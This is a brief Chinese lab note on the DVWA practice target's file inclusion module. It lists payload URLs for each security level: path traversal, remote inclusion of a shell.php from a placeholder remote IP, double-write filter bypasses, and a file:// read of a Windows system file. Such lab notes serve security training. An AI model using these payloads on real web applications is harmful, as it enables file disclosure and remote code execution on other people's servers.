DVWA靶场
Low
正常包含
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file1.php
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file2.php
http://127.0.0.1//dvwa/vulnerabilities/fi/?page=file3.php
包含敏感文件
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=../../1.txt
远程包含http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://远程IP/1.txt
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://远程IP/alert.html
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=http://远程IP/shell.php
medium
双写绕过
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=hthttp://tp://ip/alert.html
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=..././..././1.txt
high
file协议
http://127.0.0.1/dvwa/vulnerabilities/fi/?page=file:///C:\Windows\system.ini
Impossible
白名单包含